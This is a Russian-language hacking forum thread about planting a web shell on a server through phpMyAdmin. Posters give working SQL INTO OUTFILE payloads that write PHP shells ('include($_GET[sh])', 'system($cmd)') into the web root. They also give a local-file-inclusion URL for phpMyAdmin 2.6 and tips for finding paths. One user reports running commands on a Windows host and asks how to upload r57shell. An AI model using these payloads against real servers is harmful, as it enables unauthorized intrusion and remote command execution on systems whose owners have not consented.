Залить ШЕЛЛ через PHPmyadmin

Собственно сабж

 

помоему никак.

 

если есть права на запись, выполняй запрос

select '<? include($_GET[sh]); ?>' from table into outfile '/home/user/...';

 

2ettee
а какая разница между моим и твоим постом?

 

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

 

кароче если версия 2.6.* и есть права на запись хоть в тмп, то можно
phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE

 

phpmyadmin/libraries/database_interface.lib.php нет там такого

версия phpMyAdmin 2.5.7

 

в phpmyadmin довольно много способов узнать локальный путь например попросить какойнить файл который обычно не вызывается на прямую а только инклудится, а потом попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php' либо вобще поищи на http://packetstormsecurity.org про phpmyadmin инфу

 

ок у меня получилось select '<?php system($cmd) ?>' into outfile '/path_to_phpmyadmin/shell.php'
ротом я набрал www.host/phpmyadmin/shell.php?cmd=dir,но там все в нечетабельном виде,как мне напрмер залить r57shell? На сервере стоит винда

 

в pm

 

пишет #1045 - Access denied for user 'name'@'localhost' (using password: YES)

 

Значит нет прав на заливку.

 

сделал вышеописанный запрос вот что мне выдало
Can't create/write to file 'd:\htdocs\phpmyadmin\shell.php (errcode 22)

 

http://dev.mysql.com/doc/refman/5.0/en/cannot-create.html

 

Error code: 22 ozna4aet invalid argument
как быть дальше?